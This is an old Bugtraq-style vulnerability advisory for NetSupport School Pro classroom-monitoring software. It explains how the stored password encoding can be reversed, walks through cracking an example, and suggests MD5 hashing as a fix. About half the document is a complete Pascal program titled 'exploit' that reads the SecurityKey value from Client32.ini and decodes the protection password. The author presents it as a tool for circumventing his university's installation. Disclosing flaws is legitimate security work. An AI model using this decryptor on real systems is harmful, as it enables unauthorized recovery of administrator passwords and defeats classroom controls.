netsupport.txt

`To the moderator, this is my first bugtraq posting, feel free to make any   
changes you feel nessessary to make this more helpful. Thank you very much  
  
Vendor : NetSupport  
URL : http://www.netsupport-inc.com/  
Version : Invision NetSupport School Pro  
Risk : Password protection weakness  
  
Description: NetSupport School, market leading training tool for the modern   
classroom featuring full student remote control, application & internet   
monitoring, customized student testing and more.  
  
Password protection weakness: The password encryption method is a method   
which is easily reversed. The encryption method is as follows:  
The letters are expressed using a hexadecimal type of system. Every letter   
is shown by two characters the first character can be any ascii character   
while the second is in a range from a-p. This works just like hex in that   
ap+1=ba. Its not case sensitive so that also makes it easier for kids to get   
passes. The characters start at EM. So A= EM B=EN and so on. Each letter is   
also added to by the number of letters in front of it. So the crypt of aa=   
EN9O while the crypt of aaa=EO9P>A. I can figure the routine used for the   
crypt of each colum though. Here is a reference for the letter a and its   
crypt of each colum EM, 9O, >a, BC, FE, :G, >I, BK, FM, :O. Based on this   
knowledge and the hex-esque characters, and the addition to each char based   
on the amount of letters in front of it, you can get the password from an   
encrypted one. An example of a cracked password: The crypt is “GC;H@KEO” GC   
-3 = FP (according to the hexish system) FP=T so the first letter is T. Take   
9O (known “a” for the 2nd column) and add the difference from a-t to it (19)   
and you get ;B add 2 to it (amount of letters in front of it) = ;D then   
subtract ;D from ;H you get 4 places. A+4 = E the second letter is “E” you   
continue to do this until you get the password “test”  
  
Solution: based on my research this program uses a hash type validation   
method, so the quickest and most painless solution would be to use the md5   
routine for passwords.  
  
Credits: Credits go to Drexel University, and Harry Hoffman because if they   
hadn’t have used this software I would have never had the urge to circumvent   
it ;)  
As well as Mr. Flynn for teaching me pascal (even though its 20+ years old   
its still my favorite)  
  
  
  
  
Spiffomatic64  
Hacking is an art-form  
  
  
Here is a program that will decrypt the password off of a machine with the   
software running:  
(old school :-D its written in pascal)  
  
program exploit;  
uses crt;  
var i,j,length,x,y,crazy:integer;  
passfile:text;  
line:string;  
password,p:array [1..100] of char;  
known,convert:array [1..26,1..3] of char;  
ch,tempx,tempy,key:char;  
  
procedure conv;  
begin  
convert[1,1]:='E';  
convert[1,2]:='M';  
convert[1,3]:='A';  
for i:=2 to 26 do begin  
if convert[i-1,2]='P' then begin  
convert[i,1]:=chr(ord(convert[i-1,1])+1);  
convert[i,2]:='A';  
end  
else begin  
convert[i,1]:=convert[i-1,1];  
convert[i,2]:=chr(ord(convert[i-1,2])+1);  
end;  
convert[i,3]:=chr(ord(convert[i-1,3])+1);  
end;  
end;  
  
procedure hex(a,b:char; num:integer);  
begin  
if num>0 then begin  
for i:=1 to num do begin  
if b='P' then begin  
b:='A';  
a:=chr(ord(a)+1);  
end else inc(b);  
end;  
end;  
if num<0 then begin  
for i:=-1 downto num do begin  
if b='A' then begin  
b:='P';  
a:=chr(ord(a)-1);  
end else dec(b);  
end;  
end;  
tempx:=a;  
tempy:=b;  
end;  
  
function compare(a,b:char):char;  
begin  
for i:=1 to 26 do begin  
if (a=convert[i,1])and(b=convert[i,2]) then compare:=chr(i+64);  
end;  
end;  
  
function diff(a,b,c,d:char):integer;  
var num1,num2,num3:integer;  
begin  
num1:=ord(a)*16+ord(b);  
num2:=ord(c)*16+ord(d);  
num2:=num2;  
diff:=num2-num1;  
end;  
  
  
Begin  
{get the hash from client32.ini}  
clrscr;  
Writeln(' _________________________________________________________');  
Writeln('|NetSupport School Pro Password decryptor |');  
Writeln('|Credits goto: Drexel University, Harry Hoffman, Mr. Flynn|');  
Writeln('|and my wonderful fiance Halley |');  
Writeln(' ---------------------------------------------------------');  
Writeln('');  
assign (passfile,'C:\Progra~1\NetSup~1\Client32.ini');  
reset (passfile);  
i:=0;  
while not eof(passfile) do  
begin  
line:='';  
while not EoLn(passfile) do  
begin  
Read(passfile, ch);  
line:=line+ch;  
if line='SecurityKey=' then begin  
while not eoln(passfile) do  
begin  
inc(i);  
read(passfile,ch);  
password[i]:=ch;  
end;  
length:=i;  
end;  
end;  
readln(passfile,line);  
end;  
write('Hash: ');  
for i:=1 to length do write(password[i]);  
writeln('');  
{decrypt the hash}  
conv;  
known[1,1]:='E';  
known[1,2]:='M';  
known[2,1]:='9';  
known[2,2]:='O';  
known[3,1]:='>';  
known[3,2]:='A';  
known[4,1]:='B';  
known[4,2]:='C';  
known[5,1]:='F';  
known[5,2]:='E';  
known[6,1]:=':';  
known[6,2]:='G';  
known[7,1]:='>';  
known[7,2]:='I';  
known[8,1]:='B';  
known[8,2]:='K';  
known[9,1]:='F';  
known[9,2]:='M';  
known[10,1]:=':';  
known[10,2]:='O';  
known[11,1]:='?';  
known[11,2]:='A';  
known[12,1]:='C';  
known[12,2]:='C';  
known[13,1]:='G';  
known[13,2]:='E';  
known[14,1]:=';';  
known[14,2]:='G';  
known[15,1]:='?';  
known[15,2]:='I';  
{get the first char}  
for i:=1 to round(length/2) do p[i]:=chr(65);  
for x:=1 to round(length/2) do begin  
crazy:=0;  
crazy:=-(round(length/2))+x;  
for y:=1 to round(length/2) do crazy:=crazy-(ord(p[y])-65);  
hex(password[x*2-1],password[x*2],crazy);  
p[x]:=chr(diff(known[x,1],known[x,2],tempx,tempy)+65);  
end;  
writeln('');  
write('Password: ');  
for i:=1 to round(length/2) do begin  
write(p[i]);  
end;  
readkey;  
  
end.  
  
_________________________________________________________________  
Get tax tips, tools and access to IRS forms – all in one place at MSN Money!   
http://moneycentral.msn.com/tax/home.asp  
`